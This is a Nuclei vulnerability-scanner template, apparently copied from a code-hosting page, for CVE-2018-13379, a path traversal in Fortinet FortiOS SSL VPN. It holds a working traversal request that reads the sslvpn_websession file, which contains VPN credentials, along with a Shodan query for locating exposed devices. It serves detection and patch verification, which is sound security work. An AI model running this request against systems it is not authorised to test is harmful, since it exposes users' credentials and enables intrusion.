42 lines
1.7 KiB
YAML
42 lines
1.7 KiB
YAML
id: CVE-2018-13379
|
|
|
|
info:
|
|
name: Fortinet FortiOS - Credentials Disclosure
|
|
author: organiccrap
|
|
severity: critical
|
|
description: Fortinet FortiOS 6.0.0 to 6.0.4, 5.6.3 to 5.6.7 and 5.4.6 to 5.4.12 and FortiProxy 2.0.0, 1.2.0 to 1.2.8, 1.1.0 to 1.1.6, 1.0.0 to 1.0.7 under SSL VPN web portal allows an unauthenticated attacker to download system files via special crafted HTTP resource requests due to improper limitation of a pathname to a restricted directory (path traversal).
|
|
impact: |
|
|
An attacker can obtain sensitive information such as usernames and passwords.
|
|
remediation: |
|
|
Apply the necessary patches or updates provided by Fortinet to fix the vulnerability.
|
|
reference:
|
|
- https://fortiguard.com/advisory/FG-IR-18-384
|
|
- https://www.fortiguard.com/psirt/FG-IR-20-233
|
|
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-13379
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
|
cvss-score: 9.8
|
|
cve-id: CVE-2018-13379
|
|
cwe-id: CWE-22
|
|
epss-score: 0.97305
|
|
epss-percentile: 0.99854
|
|
cpe: cpe:2.3:o:fortinet:fortios:*:*:*:*:*:*:*:*
|
|
metadata:
|
|
verified: true
|
|
max-request: 1
|
|
vendor: fortinet
|
|
product: fortios
|
|
shodan-query: http.html:"/remote/login" "xxxxxxxx"
|
|
tags: cve2018,cve,fortios,lfi,kev,fortinet
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession"
|
|
|
|
matchers:
|
|
- type: regex
|
|
part: body
|
|
regex:
|
|
- '^var fgt_lang ='
|
|
# digest: 4b0a00483046022100ed688fb687003137454ccb27e917dd0a47b6effc89bb9404707395186fce0efd0221008586aa2b87390aed0dd185af0e8a536f991a73de918ddcad55a7bc3acfdbc0fe:922c64590222798bb761d5b6d8e72950 |